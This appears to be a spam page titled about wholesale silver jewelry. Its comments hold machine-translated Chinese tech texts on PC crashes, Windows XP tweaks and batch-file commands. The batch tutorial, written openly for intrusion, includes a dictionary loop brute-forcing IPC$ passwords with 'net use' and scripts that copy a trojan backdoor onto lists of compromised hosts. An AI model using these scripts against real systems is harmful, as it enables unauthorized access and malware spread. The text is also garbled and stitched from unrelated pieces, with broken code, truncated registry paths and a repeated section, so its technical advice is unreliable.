wholesale silver cubic zirconia and crystal jewelry Master recently! Batch problem

wholesale silver cubic zirconia and crystal jewelry

5 thoughts on “wholesale silver cubic zirconia and crystal jewelry Master recently! Batch problem”

  1. wholesale jewelry locket Simple version]

    . The cause of the virus.
    . The problem of hardware. For example, power
    3. Software issues. For example, CPU temperature monitoring software.
    . The system file is lost and caused by mistake.
    5. Hacker attacks you.
    The specific solution is to redo the system, you can exclude the first, 3, 4, and 5; if you still die, it is a hardware problem.

    [Professional version]

    ※ Hardware Reason:

    ★ "Poor heat dissipation": Displays, power and CPUs are very calorie at work very well. Large, so good ventilation in the constitution is very important. Too long working hours can also cause the power supply or display to dissipate heat and cause the computer to crash. The cooling of the CPU is an important issue that is related to the stability of computer operation, and it is also a "hardest hit area" for heat dissipation failure.
    ★ "Dust killer": Too much dust in the machine can also cause crash failure. If the soft drive magnetic head or optical drive laser head is stained with too much dust, it will cause reading and writing errors, which will cause the computer to crash.
    ★ "Software and hardware is not compatible": For example, 3D production and some special software may not be installed or started in some computers, which may have problems with software and hardware compatibility.
    ★ "Memory Failure": It is mainly caused by loose memory bars and its own quality. The overlapping corner of the memory strip should be excluded according to the specific situation. If there is a problem with the quality of the memory bar, it is necessary to replace the memory to solve the problem.
    ★ "Hard disk failure": mainly because the hard disk is aging or the bad sectors are caused by improper use. In this way, the machine is easy to crash while driving. You can use dedicated tools to perform barrier treatment. If severe damage can be replaced, you can only change the hard disk. In addition, for the motherboard that does not support UDMA66/100, pay attention to the setting of hard disk operation methods in CMOS.
    ★ "CPU overclocking": overclocking increases the operating frequency of the CPU, and at the same time, it may also make its performance unstable. Of course, the solution is relatively simple, that is, the CPU is returned to the normal frequency.
    ★ "Hardware Resources Conflict": The common is the conflict of the setting of sound cards or graphics cards, causing abnormal errors. In addition, if the interruption of other devices, DMA or port conflict may cause a small number of drivers to produce abnormalities to cause death. The solution is to start with the "security mode" and make appropriate adjustments in the "control panel"-> "system"-> "equipment management".
    ★ "Inferiority Parts": When a small number of illegal merchants are assembled, they use poor quality cards, memory, and some even sell counterfeit motherboards and polished CPUs and memory. Such machines are running. It is very unstable, and it is inevitable to crash. Therefore, users should be vigilant when buying the machine.

    ※ Software:

    ★ Virus infection: Virus can reduce the efficiency of computer work and cause frequent crashes. Such faults can be comprehensively checked and anti -virus by running anti -virus software, and antivirus software should be upgraded in time.
    ★ CMOS settings improper: Hard disk parameter settings, mode settings, improper memory parameter settings, so that the computer cannot start.
    ★ Mistakers of the system file: Since the Windows 9X startup requires files such as Command, IO.Sys, MSDOS.Sys, etc. If these files are destroyed or deleted by mistake, even if the various hardware settings in CMOS are correctly set correctly without errors, no errors are correct. It doesn't help. At this time, the system must be re -transferred by the system disk.
    ★ Initialized files are destroyed: Because Windows 9X starts, you need to read System.ini, Win.ini, and registry files. If config.sys, AutoExec.bat files are present, these two files will also be read. As long as there are errors in these files, they may crash, especially the four files: System.ini, Win.ini, User.dat, System.dat.
    ★ Dynamic link library file (DLL) loss: there is also a type of file in Windows operating system that is also very important. This is the dynamic link library file of expansion named DLL. Essence If a shared file is deleted together when an application is deleted, especially the more important core link file is deleted, the system will crash or even collapse.
    ★ The remaining space of the hard disk is too small or too much fragments: because some applications need a large amount of memory, it is necessary to use disk space to provide virtual memory. If there is too little remaining space for the hard disk, it is difficult to meet the operating needs of the software, it is easy to be easy Causes crash. The method of solving such problems is to reasonably divide disk space, use the "disk fragmentation program" to regularly organize the hard disk, and remove the junk file in the hard disk.
    ★ Improper software upgrade: Some components shared in the software will be upgraded during the software upgrade process, but other programs may not support upgraded components and cause various problems.
    ★ Abuse testing software: The test version of the software usually has some bugs or is not stable in some aspects. After use, the program error prompts are wrong, crashes or the system cannot start.
    illegal uninstallation software: If you do not pass the software uninstallation, delete the software installation directory directly. The corresponding link files in the registry and the Windows directory will not be removed, causing the system to become unstable and cause crashes. It is recommended to use the uninstalled program provided by the software when deleting unnecessary application software. It is best to run the "Add/Delete Procedure" in the "Control Panel" to completely delete the software from the system.
    ★ Pirate software: Pirate software may hide the virus. Once the execution is executed, the system will be automatically modified to make the system crash during operation.
    ★ There are too many procedures for starting: Due to too much program, the system resources are tight, and the data required by individual programs cannot be found in memory or virtual memory, and abnormal errors will occur.
    illegal operation: illegally open or release related procedures with illegal formats or parameters, which will also cause computer crash.
    ★ Non -normal shutdown computer: Do not use the chassis power button directly to force the shutdown, which can easily cause system file damage or loss, causing automatic start or running when running. For Windows 98/2000/NT and other systems, this is very important. In severe cases, the system crashes. ★ Memory conflict: Sometimes it is normal to run a variety of software, but suddenly it is inexplicably crashing. It is normal to run these applications after reorganization. This is a fake dead machine phenomenon. Most of the reasons are the conflict of memory resources of Win 98.

    ★★★ Prevent fourteen moves of cras ★★★

    1. Make sure the correct BIOS settings. The settings in BIOS must be appropriate. The wrong BIOS settings will make you crash when running Windows.

    2. Regularly check computer accessories contact. When the card card is in poor contact, it will cause the system to crash. Therefore, when replacing the computer accessory, you must make the board card fully contact with the motherboard.

    3. Clean the chassis regularly. Too much dust can make the panels poorly contact, causing the system to crash during operation. Therefore, the chassis should be cleaned at any time, so as not to let too much dust accumulate in the case.

    4. Persist in killing the virus seriously. Do not use it easily for the disk or floppy disk of unknown origin. For the attachments in the email, you must first check the antivirus software before opening.

    5. Open in the right operation order. Do not turn off the power before the application software is running normally, otherwise the system file will be damaged or lost, causing crash during starting or running.

    6. Avoid multi -tasks at the same time. Do not run other software during the disk finishing or using anti -virus software, otherwise it will cause crash.

    7. Don't be too new. The drivers of various hardware do not have to be updated at any time, because the developed drivers often have bugs in it, which will cause damage to the system and cause the system to crash. The latest one is not necessarily the best.

    8. When uninstalling the software, use your own anti -installation program or installation / uninstall in Windows, do not directly delete the program folder, because certain files may be shared by other programs. Once these shared files are deleted, application software will not be used in use And crashing.

    9. When setting up hardware devices, it is best to check whether there is a reserved interrupt (IRQ). Do not let other devices use the interrupt number to avoid causing the interrupt conflict and cause the system to crash.

    10. When surfing the Internet, do not open too many browser windows, otherwise it will lead to insufficient system resources and cause the system crash.

    11. If your machine memory is not very large, do not run a program that takes up large memory, such as Photoshop, otherwise it is easy to crash when running.

    12. For system files or important files, it is best to use hidden attributes so that these files are not deleted due to error operation, causing the system crash.

    13. When modifying the main guidance record of the hard disk, it is best to save the original record first to prevent the original guidance record from recovering due to the failure of modification.

    14. CPUs, graphics cards and other accessories generally do not overclocking. If you really need to be over, pay attention to the temperature of the overclocking rear board card. The CPU, graphics card and other long -term work at non -normal frequencies and temperature will automatically restart or crashes. Mainboard.

    Windows XP is a new generation of Windows operating system launched by Microsoft. Although Windows XP can be regarded as the most powerful operating system so far, as in the past Windows operating system, the newly installed Windows XP system It is not in the best state, there are procedures that some users do not need to use and have never used. You can use some techniques to modify the original setting value to optimize Windows XP. Let's explain the optimization of Windows XP from several aspects.
    . Start optimization
    1. Turn off some procedures and resident programs accompanied by Windows. Select the "Start" menu-> "Run", enter MSCONFIG into the "System configuration application", turn off the unnecessary program in the [Start] column, cancel the hook in the box, and turn off the unnecessary program. Uncertain programs cannot be closed, so as not to cause Windows errors. (First try whether you can cancel the resident in the software itself, and then use this method.) After completing, press [App), and then start it.

    2, set a fixed IP address for Windows XP. Although Windows XP is quite fast to enter the desktop, it is step by step. You must wait for a while to really run the program. If your machine installed network card, Windows XP will automatically search for IP address after entering the desktop, so if you do not set a fixed IP address, it will waste a lot of time on searching for IP addresses.
    3. Reduce disk scanning time. If Windows XP is not shut down normally, the system will automatically execute the disk scanning program when starting again. It will take 10 seconds to wait before starting to scan. At this time, you can open the "Start → Run" dialog box and type "CMD". Click the "OK" button to enter the command prompt mode of Windows XP. Enter "CHKNTFS /T: X" after the command prompt (does not contain quotation marks when entering, x is waiting time). 3 ", indicates that the waiting time is 3 seconds.
    4, reduce the waiting time of the operating system. If multiple operating systems are installed, the default waiting time will be found in the boot menu in many operating systems. Click "My Computer", select the "System Properties" dialog box, click the "Advanced" tab, and click the "Settings" button in the "Starting and Failure Recovery" area to check the "display operating system list in the setting page The check box before the "time when the recovery option is displayed" and the "time when needed to display the recovery option", and then enter the corresponding value of these two items to reduce the waiting time, and click the "OK" button.
    In addition to the above four methods, we can also set and close unnecessary system services to the startup items in the registry. In addition, we usually use disk cleaning tools and disk fragmentation procedures. Improve the starting speed of the system.
    . Login optimization
    1. Time to wait for the "processing program" to shorten the time. Select the "Start" menu-> "Run", enter Regedit, pop up the registry editor, find [HKEY_CURRENT_], select in the window on the right, right-click the mouse, select "Modify", change its numerical data to 1000, Wait for 1 second when you turn off the "processing program" (the default value is: 20000).

    2, shorten the time when the "processing program" is waiting for error. Select the "Start" menu-> "Run", enter Regedit to pop up the registry editor, and find [HKEY_CURRENT_] in the window on the right, select the mouse button, select "Modify", change its numerical data to 200, that is, "Procedure" waits for 0.5 seconds when errors (the default value is: 5000).
    3. Let the system automatically close the procedure of stopping response. Select the "Start" menu-> "Run", enter Regedit, pop up the registry editor, find [HKEY_CURRENT_], select in the window on the right, right-click the mouse, select "Modify", change its numerical data to 1 ( The default value is: 0).
    4, speed up the menu display speed. Select the "Start" menu-> "Run", enter Regedit, pop up the registry editor, find [HKEY_CURRENT_], select in the window on the right, right-click the mouse, select "Modify", change its numerical data to 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 or 100 Smaller (the default value is: 400), it is recommended not to use 0, because as long as the mouse accidentally touches "all programs", the entire menu will run out, then this is messy.
    5, shorten the waiting time. Select the "Start" menu-> "Run", enter Regedit, find [HKEY_LOCAL_] in the pop-up registry editor, select right mouse button in the window on the right, select "Modify", change its numerical data to 1000 to 1000 Or smaller (original settings: 20000).
    . Memory optimization
    Windows XP is a very good operating system, but its requirements for memory are amazing. Even if it is 128 megabytes of memory, the system memory will cause low speed. In Windows XP, a lot of new features have been added. These features are large households in memory. As long as we turn off these unused functions, then 128 mega memory is more than enough for us.
    1. Cancel "Automatic Update", and automatically update reminds users to upgrade its own system. It will keep the permanent memory, so we turn off the "automatic upgrade" function and change to "manual upgrade". The specific operation is: right -click "My Computer", click the attribute, click "Automatic Update", select "Close the Automatic Update in the" Notice Settings "column. For most users, there is no great effect on most users, so we decided to close it to save memory. The specific operation is: right -click "My Computer", click the attribute, and the system attribute dialog box will pop up. "Restore", hook on the "Close System Restoration on All Drives" options.
    3. Close "Remote Desktop", XP's function only provides interoperability on the network. For ordinary users It is, so we turn it off and prevent it from waste the memory there.
    4, turn off the "Auto Send Error" function, send an error to Microsoft. This is the "Auto Send Error" function in XP. To us It is not meaningful to send it to Microsoft, so we should turn off this function without hesitation. Right -click "My Computer", click the attribute, click "Advanced" → "Error Report", and select "Disable Error Report" Function.
    5. Close the effect that you do not need in the "Visual Effect", the operation interface of Windows XP is indeed very beautiful. Behind the good -looking consumption of a large amount of memory, compared to speed and beauty, we Still want to choose the former, right -click "My Computer", click the attribute, click "Advanced", in the "Performance" column, click "Settings", click "Visual Effect", and set all the special appearance settings here. Turn off, we can save "a large" memory.
    6, close the "Internet time synchronization" function, "internet time synchronization" is to make your computer clock per week with the Internet time server, In this way, your system time will be accurate, but this feature is not very useful for us, and it may cause crash problems. So we have to turn it off.
    7, turn off excess service, Windows XP Like Windows 2000, it can be used as such as HTTP services, SMTP services, and FTP services. These services are resident memory. Therefore, whenever Windows XP starts, many services have been launched. Many services are for us ordinary users. It is completely useless, so it is a good choice to turn them off.
    . Four. Hard disk optimization
    1. Install the file system format of NTFS. The management functions of confidentiality, compression, use of rights and disk quotas. Therefore, in terms of file security and confidentiality, FAT32 is higher than FAT32. And the operating system installed under the NTFS file system will compress the unused files, so compared with FAT32, compared with FAT32 It also saves a considerable space, so if it is used to install the operating system installed under the FAT32 file system (such as Windows98 ...) may not be able to read files in NTFS correctly.
    It the more data in the sector, the more data is more than the data. Therefore, it is recommended that you use the NTFS file system to install the Windows XP system.
    2, set the IDE device to DMA transmission mode. For some reasons, Windows XP sometimes uses PIO parallel input and output transmission mode on the IDE channel, not DMA mode. If this is the case, users can manually change the IDE channel to DMA mode, which can reduce the CPU cycle occupied by the device. Open the device manager (right -click my computer, select attributes, click the hardware tab, click "Device Manager" to open), then click on the "IDE ATA/Atapi Controller" branch, double -click "Primary Ide Channel", click advanced settings. Check the "transmission mode" drop -down menu and set them all to DMA if available (DMA), click OK. Modify each IDE controller in the same way.

    3, delete the content of the webpage cache content. Enter the control panel, double -click the "Internet Options" into the "Internet Properties", click "Delete File" under the "Internet temporary file" in [Conventional], and tick "Delete All Offline content", press "OK" OK "OK" OK "

    It [Historical Records] (History) in [Conventional] is also deleted by the way. Delete some TEMP temporary disks: like "E:" (Note: My XP is installed on the E drive.), "(User Name)" and some software exclusive TEMP (most of them should be set in the software itself Defined) Delete together.
    4, regular disk finishing. When the hard disk is used for a long time, and the program software is installed and deleted, it will be broken into continuous files in the sector, so that when the hard disk is searching for data, it will take more time to affect the efficiency. Therefore, it is absolutely necessary to do regularly to finish disk finishing. This time, Windows XP has made significant progress in disk finishing compared with the Windows98's finishing programs. At least it does not take a lot of time. If the user thinks that Windows itself is not good, you can also use Norton's Speeddisk.
    . Network optimization
    1. Fast browse of the sharing of the LAN
    Generally, Windows XP will fully check all the scheduled tasks on the opponent's machine when connecting other computers. This check will wait for you to wait 30 seconds for 30 seconds Or more time. The method of removing finds "HKEY_LOCAL_" from the registry.
    In this key value, there will be a {d6277990-4C6A-11CF-8D87-} key. After deleting it, the computer is restarted. Windows XP will no longer check the scheduled task, and the speed will be significantly improved.
    2. Increase the transmission rate of 10/100M network card
    The select "Start → Connect → Display All Connection", double -click the connection used by the network card, click the "Properties" button, open the "Properties" dialog box, select " Advanced "tab. Select "Link Speed/Duplex Mode" in the "Properties" column, and then change the "Auto Mode" to "10 Half Mode" in the "Settings Value" column.
    This so, the attributes of the 10/100M adaptive network card are hand -made to a 10M semi -dual -work mode, so that the network card does not conduct automatic negotiation, so that the network card is always carried out at a speed of 10Mbps when transmitting data, which greatly improves, greatly improved The transmission efficiency between the network. This setting is only effective for some network cards.
    3, accelerate sharing
    usually when Windows XP is connected to other computers, you will check all the scheduled tasks on the opponent's machine -this is really redundant, and it will wait for 30 seconds to wait for 30 seconds, and you will wait for 30 seconds. It's so bad. First, find HKEY_LOCAL_/CURRENT in the registry. There should be a {d6277990-4C6A-11CF-87-} key. Just delete it and restart the computer, Windows will no longer check the predetermined task, and the speed is significantly improved!
    4, the problem that stops pause when solving the execution of winxp
    Start -network connection -local connection, right -click, select the attribute, select the "Internet protocol (TCP/IP)", click the attribute, use the following below IP address: 192.168.0.1, subnet mask: 255.255.255.0, so it is fine, it will not stop at the boot in the future.
    It's simple settings above, I believe it can provide you with a better operating environment. I hope that this can give friends who use Windows XP more easily and enjoying the fun brought by Windows XP.

  2. sidney wholesale jewelry stores Use start to call the first program to
    This is an online extract:
    It simplicity batch processing tutorial (.bat)
    Published: 2004-3-24 10:31:23 The author agrees not to reprint!
    -------------------------------------------------------------------------------- -----------------------------------------

    n
    The recent discussion of batch processing technology is relatively hot, and there are also many good batch procedures for release, but if there is no certain phase
    The knowledge of knowledge is not easy to understand and understand these batch documents, It is not to mention that I can write it myself, and the ancient saying: "Giving
    people to fish, it is better to grant people to fish." Because there seems to be a relatively complete textbook on the Internet, I took a little time to write this this write this because I wrote this this
    u003Cu003C Concise Classification Tutorial >> For novice friends. It is also dedicated to all friends who work hard and shared for the network.

    File, it contains one or more commands. Its file extension is called .bat or .cmd.
    The name of the processing file under the command prompt, or double -click the batch of processing files, the system will call cmd.exe in accordance with the order of each command in the file to run one by one. The use of batch files (also known as batch process or foot
    ) can simplify daily or repetitive tasks. Of course, the main content of our version is to introduce batch processing in the invasion
    . For example, the batch processing documents we have to mention later to patch the system, batch implantation of the back door program, etc.
    It, let's start our approach to study.

    . Simple batch of internal commands Introduction
    1.echo command
    Open the back display or turn off the request recovery function, or display the message. If there is no parameter, the Echo command will display the current display
    settings.
    grammar
    eCho [{on | off}] [Message]
    sample: @ECHO OFF / Echo Hello World
    Also known as the pipeline symbol, generally uses >> ^) combined with
    The files in the file in a specific format. This will be reflected in future examples.

    2.@ command
    indicates that the command does not show@, and it is naturally not allowed to let
    The command used.
    sample: @echo OFF
    @echo now the program, please wait a minite ...
    @format x:/q/u/autoset (format this command cannot be used/y Parameters, gratifying is that Microsoft stays
    The autoset parameter for us, the effect is the same as/y.)
    3.goto command
    After finding the label, the program will process the command starting from the next line.
    grammar: Goto Label (label is a parameter, specify the line in the batch processing program you want to turn.)
    sample:
    if {%1} == {} Goto Notarms nif {% 2} == {} Goto Notarms (If you do n’t understand if the IF,%1, and%2 you do n’t understand, you will jump first, and there will be detailed explanations in the back.)
    @Rem check if null show usage rn:noparms rnecho Usage: monitor.bat ServerIP rngoto end rn标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用To indicate that this letter is a standard
    , the GOTO command is based on this: to find the next step to jump there. It is best to explain that you look at
    to understand your intentions.

    4.rem commands
    Annotation command, which is equivalent to/*-------*/, it will not be executed, it just plays an annotation role It is convenient for
    others to read and modify your own future.
    Rem message
    sample: @rem Here is the.

    5.pause command
    When running the PAUSE command, the message below will be displayed:
    press any key to consinue ..
    sample:
    @echo off
    : Begin
    copy A:*.* D: ACK
    eCho please put a new diso driver a
    pause
    goto begin
    In this example, all files on the disk in the drive A are copied to D: ACK. The displayed comment prompts you to put another disk into the drive A in another
    , the pause command will hang the program so that you can change the disk and press the any key to continue
    processing.

    6.call command
    It call another batch processing program from one batch process, and does not terminate the parent batch processing program. The call command accepts the tagging of the target with the target. If the call is used outside the script or batch file, it will not work in the command line.
    grammar
    Call [[Drive:] [PATH] FILENAME []] [: label [arguments]]
    Parameters
    [Drive:} [PATH] FILENAME
    specified The position and name of the batch process to call. The FILENAME parameter must have .bat or .cmd extensions.

    7.start commands
    Colid the external program. All DOS commands and command lines can be called by the start command.
    Crofin common parameters:
    min to minimize the window at the beginning of the window
    Sepate starting 16 -bit Windows program
    high at high priority category
    RealTime in Realtime Priority Grade category Start the application
    WAIT starts the application and waits for it to end
    This parameters that are transmitted to commands/programs
    Is executed when the application is 32-bit GUI applications, cmd.exe does not Return the command prompt when the application is terminated. Such as
    The fruit is executed in the command script, the new behavior will not occur.
    8.choice command
    choice using this command allows users to enter a character to run different commands. When used, the/c: parameter should be added,
    c: After writing, you should write the character that can be inputable. There is no space between between. Its return code is 1234 ...
    , such as: choice /c: dme defrag, memory, end
    :
    sample.bat content is as follows:
    @echo off
    choice /c: DME Defrag, MEM, end
    if 3 Goto Defrag nif 2 Goto Mem
    if 1 Goto End

    : Defrag
    c: dosdefrag
    goto end
    : mem nMem
    goto end r r r r r r r r
    : End
    echo Good bye

    Puchrier will display DEFRAG, MEM, END [D, M, E]? Users can choose D M E, and then if the if statement will make r, nThe judgment, D represents a program segment that executes the label to defrag, M represents a program segment with the execution labeling MEM, E represents the primer
    At the END label, the program will display good
    by, and the file is over.

    9.if command

    if means that it will determine whether it meets the prescribed conditions, so as to determine the execution of different commands. There are three formats:
    1, if "parameter" == "string" string "to be executed
    . If the parameter is equal to the specified string, the condition is established and runs the command, otherwise run the next sentence. (Note that there are two equal numbers)
    . If "if"%1 "==" a "format a:
    if {%1} == {} Goto Notarms R {%2} == == {} Goto Notarms

    2, if exist file name is to be executed
    If there are specified files, the condition is established and runs the command, otherwise run the next sentence.
    . If if exist config.sys edit config.sys

    3, if / if not to execute the order
    If the return code is equal to the specified number, the condition is established, the running command is run, and the running command is run. Otherwise, run the next sentence.
    . If IF 2 GOTO X2
    DOS program Run a number will return a number to the DOS, called an error code or a return code, and the common return
    code is 0, 1.

    10.FOR command
    FOR command is a relatively complicated command, which is mainly used for the parameter to cycle the command within the specified range.
    When using the for command in the batch processing file, the specified variable should use %% variable

    FOR {%variable | %% variable} in (set) do commit []
    % Variable specifies a single letter replaceable parameter.
    (set) Specify one or a set of files. You can use the compatriots.
    Command specifies the command to execute each file.
    Command-Specify the parameter or command line switch to a specific command.
    When using the for command in the batch file, the specified variable should use %% variable
    instead of using %variable. The variable name is distinguished, so%i is different from%i

    . If the command extension is enabled, the following additional for command format will be subject to
    support:

    FOR /D %Variable in (set) do Command [Command-]

    If concentrated contains the passage, it is specified to match the directory name without matching the file
    .

    FOR /R [[Drive:] Path] %variable in (set) do Command [Command-

    FOR statement in each directory. If there is no specified directory after /r, use the current
    directory. If the set is only a single (.) Character, the directory tree is entered.

    FOR /L %Variable in (Start, STEP, END) Do Command [Command-PARA

    The number sequence of an incremental form from the beginning to the end.
    Therefore, (1,1,5) will produce sequence 1 2 3 4 5, (5, -1,1) will produce
    sequences (5 4 3 2 1).

    FOR /F ["Options %Variable in (File-SET) Do Command
    FOR /F ["Options %Variable in ("String") Do Command
    FOR /F ["options %variable in ('Command') do Command

    or or if there is an USEBACKQ option:

    FOR /F ["Options %variable in (File-set) Do Command
    FOR /F ["Options %Variable in ("String") Do Command
    FOR /F ["Options %Variable in ('Command') do Command

    is one or more file names. Before the next file is continued, each file has been opened, reads and processed.
    The processing includes reading files, divided it into a line of text, and then parsed each line
    The symbols with zero or more. Then use the foundation string variable value of the found symbol string
    Colt the for loop. In the default method,/f Separate the first blank symbol of
    in each line of each file. Skip the blank line. You can replace the default parsing operation by specifying "Options"
    The parameter. This quoted strings include one or more
    to specify the keywords of different analysis options. These keywords are:

    eol = c -refers to the ending of a row of notes (just one)
    skip = n -The number of rows ignored at the beginning of the file.
    delims = xxx -Fingeric separate symbols. This replace the
    default separators of the space and jump bond.
    tokens = x, y, m -n -Which symbols of each line are passed to each iteration
    for itself. This will lead to the
    format of the additional variable name. Specify the last character star number in the NTH symbol m
    , and
    so extra variables will be allocated and accepted by the last symbol analysis.
    usebackq -Specifying the new syntax has been used in the following category:
    The string of executing a post -quotation marker as a command and
    Use the dual quotation number to expand the file name.

    sample1:
    FOR /F "EOL =; tokens = 2,3* delims =," %I in (myfile.txt) do command
    n Each line in .txt, ignore those rows that make a segmentation, pass the second and third symbols of
    to the FOR program body; Boundary symbol. Please note that the statement of this for program body references%i to
    Coloning the second symbol, reference%j to obtain the third symbol, reference%k
    symbol. For a file with a space
    , you need to use the dual quotation sign to include the file name. In order to use this method to use the dual quotation marks, you also need to use the USEBACKQ option. Otherwise, the dual quotation will be
    The understanding is used as a string that defines a certain analysis.

    %I dedicated to explaining in the for statement.%j and%k are specifically explained by
    tokens = options. You can specify up to 26 symbols through tokens = one line
    , as long as you do not try to explain a variable that is higher than the letter ’z’ or
    ’z. Keep in mind that for variables are single letters, partials, and global;
    The can not have 52 or more at the same time.

    You can also use for /f to analyze logic on the adjacent string; the method is,
    Plores to include the brackets with a single number. In this way, the character
    will be regarded as a single input bank in a file.

    Finally, you can use the for /f command to analyze the output of the command. The method is to turn the
    into a inverted string. This string will be
    The is used as a command line and passed to a child CMD.EXE. Its output will be caught in

    memory and is used as file analysis. Therefore, the following example:

    FOR /F "usebackq delims ==" %I in (`set`) do @echo %i
    n will enumerate the environment in the current environment Variable name.

    It, the replacement of the for variable reference has been strengthened. You can now use the following
    option syntax:

    ~ i -delete any quotation ("), expand%i
    %~ fi -expand%i to a complete qualified qualifying Path name
    %~ di -only expand%i to one driver number
    %~ Pi -only to one path to one path
    %~ ni -only expand%i to one to one File name
    %~ xi -only expand%i to one file extension
    %~ SI -expanded path only contains short name
    %~ AI -expand%i to the file of the file to the file of the file File attribute
    %~ ti -expand%i to the date/time of the file
    %~ zi -expand%i to the size of the file
    %~ $ PATH The directory of the path environment variable, and expand the%i to the first complete qualified name found. If the environment variable
    is not defined or the file is not found, this combination key will expand
    empty string

    It can be combined with modifiers to get multiple results:

    %~ DPI -only expand%i to one driver number and path
    %~ NXI -Only expand%i to one file name and extension
    %~ fsi -only expand%i to a complete path name with a short name
    %~ dp $ PATH: I -Find column In the directory of the path environment variable, expand the%i
    to the first driver number and path found.
    %~ ftzai -expand%i to Dir
    n n n n n n n n n n n n n n n n n R n In the above examples,%i and PATH can be replaced by other valid values.%~ grammar
    In a valid for variable name to terminate. Select a capital -like capital variable name
    And avoid confusion with the combination key that does not distinguish with a small and downhill.

    above is the official help of MS. Let ’s give it a few examples to specifically explain the purpose of the for command. R nsample2:

    In use for the fordened password for a target Win2K host.
    I we use net use ipIPC $ "password" /u: "Try this to try this Connect to the target host, write the password when successful.
    The main command is: for /f i% in (Dict.txt) Do net use ipipc $ "i%"
    /u: "
    In I%to represent the admin of the admin. In Dict.txt, the value of I%use net user Command to connect. Then pass the running results to the Find command-
    FOR /F i %% in (Dict.txt) Do net user ipipc $ "i %%" /u: "" | Find ": Life
    The success is successfully completed ">> d: ok.txt, so KO is KO.

    sample3:

    did you have a lot of meat chickens waiting for you to plant the back door Trojan? When the quantity is particularly large, one thing that was very happy
    will become very depressed :). At the beginning of the article, the use of batch files can simplify daily or repeated tasks.
    So how to achieve it? Haha, you will understand when you look at it.

    The main command also has only one: (when using the for command in the batch process, the specified variable uses %% variable)
    @for /f "tokens = 1,2,3 delims = "%% I in (Victim.txt) Do start call .bat %% I %% J
    %% k
    tokens. See the above Sample1. Here it means that Victim. The content in txt is passed to the parameters in
    door.bat %I %J %K.
    . Cultivate.bat is nothing more than using the net use command to establish an IPC $ connection, and Copy Trojan back door to Victim,
    and then use the return code (IF =) to screen the host of the rear door successfully, and Echo Come out, or echo to
    specified files.
    delims = representing the content in vivtim.txt is separated by a space. I want to see here, you must understand this
    victim.txt what it looks like. It should be arranged according to the object represented by %% i %% j %% k, which is generally IP
    password username. rn代码雏形: rn--------------- cut here then save as a batchfile(I call it main.bat ) rn----- ---------------------- rn@echo off rn@if "%1"=="" goto usage rn@ for /f "tokens = 1,2,3 delims =" %% I in (Victim.txt) do start call ipchack.bat %% i
    %% j %% k n@GOTO END
    : usage
    @echo run this batch in dos modle.or just double-copy it.
    : end
    ----------------------------------------------------------------------- CUT Here then Save as a Batchfile (I call it main.bat)
    ------------------------- n n rn------------------- cut here then save as a batchfile(I call it door.bat) rn-------- --------------------- rn@net use %1ipc$ %3 /u:"%2" rn@if 1 goto failed
    @echo tring to easylish the ipc $ ……………… OK
    @Copy Windrv32.exe dmin $ System32

  3. wholesale fashion jewelry outlet 1. Simple batch of internal commands Introduction
    1.echo command
    In open display or close request recovery function, or display messages. If there is no parameter, the Echo command will display the current display
    settings.
    grammar
    eCho [{on | off}] [Message]
    sample: @ECHO OFF / Echo Hello World
    Also known as the pipeline symbol, generally uses >> ^) combined with
    The files in the file in a specific format. This will be reflected in future examples.

    2.@ command
    indicates that the command does not show@, and it is naturally not allowed to let
    The command used.
    sample: @echo OFF
    @echo now the program, please wait a minite ...
    @format x:/q/u/autoset (format this command cannot be used/y Parameters, gratifying is that Microsoft stays
    The autoset parameter for us, the effect is the same as/y.)
    3.goto command
    After finding the label, the program will process the command starting from the next line.
    grammar: Goto Label (label is a parameter, specify the line in the batch processing program you want to turn.)
    sample:
    if {%1} == {} Goto Notarms nif {% 2} == {} Goto Notarms (If you do n’t understand if the IF,%1, and%2 you do n’t understand, you will jump first, and there will be detailed explanations in the back.)
    @Rem check if null show usage rn:noparms rnecho Usage: monitor.bat ServerIP rngoto end rn标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用To indicate that this letter is a standard
    , the GOTO command is based on this: to find the next step to jump there. It is best to explain that you look at
    to understand your intentions.

    4.rem commands
    Annotation command, which is equivalent to/*-------*/, it will not be executed, it just plays an annotation role It is convenient for
    others to read and modify your own future.
    Rem message
    sample: @rem Here is the.

    5.pause command
    When running the PAUSE command, the message below will be displayed:
    press any key to consinue ..
    sample:
    @echo off
    : Begin
    copy A:*.* D: ACK
    eCho please put a new diso driver a
    pause
    goto begin
    In this example, all files on the disk in the drive A are copied to D: ACK. The displayed comment prompts you to put another disk into the drive A in another
    , the pause command will hang the program so that you can change the disk and press the any key to continue
    processing.

    6.call command
    It call another batch processing program from one batch process, and does not terminate the parent batch processing program. The call command accepts the tagging of the target with the target. If the call is used outside the script or batch file, it will not work in the command line.
    grammar
    Call [[Drive:] [PATH] FILENAME []] [: label [arguments]]
    Parameters
    [Drive:} [PATH] FILENAME
    specified The position and name of the batch process to call. The FILENAME parameter must have .bat or .cmd extensions.

    7.start commands
    Colid the external program. All DOS commands and command lines can be called by the start command.
    Crofin common parameters:
    min to minimize the window at the beginning of the window
    Sepate starting 16 -bit Windows program
    high at high priority category
    RealTime in Realtime Priority Grade category Start the application
    WAIT starts the application and waits for it to end
    This parameters that are transmitted to commands/programs
    Is executed when the application is 32-bit GUI applications, cmd.exe does not Return the command prompt when the application is terminated. Such as
    The fruit is executed in the command script, the new behavior will not occur.
    8.choice command
    choice using this command allows users to enter a character to run different commands. When used, the/c: parameter should be added,
    c: After writing, you should write the character that can be inputable. There is no space between between. Its return code is 1234 ...
    , such as: choice /c: dme defrag, memory, end
    :
    sample.bat content is as follows:
    @echo off
    choice /c: DME Defrag, MEM, end
    if 3 Goto Defrag nif 2 Goto Mem
    if 1 Goto End

    : Defrag
    c: dosdefrag
    goto end
    : mem nMem
    goto end r r r r r r r r
    : End
    echo Good bye

    Puchrier will display DEFRAG, MEM, END [D, M, E]? Users can choose D M E, and then if the if statement will make r, nThe judgment, D represents a program segment that executes the label to defrag, M represents a program segment with the execution labeling MEM, E represents the primer
    At the END label, the program will display good
    by, and the file is over.

    9.if command

    if means that it will determine whether it meets the prescribed conditions, so as to determine the execution of different commands. There are three formats:
    1, if "parameter" == "string" string "to be executed
    . If the parameter is equal to the specified string, the condition is established and runs the command, otherwise run the next sentence. (Note that there are two equal numbers)
    . If "if"%1 "==" a "format a:
    if {%1} == {} Goto Notarms R {%2} == == {} Goto Notarms

    2, if exist file name is to be executed
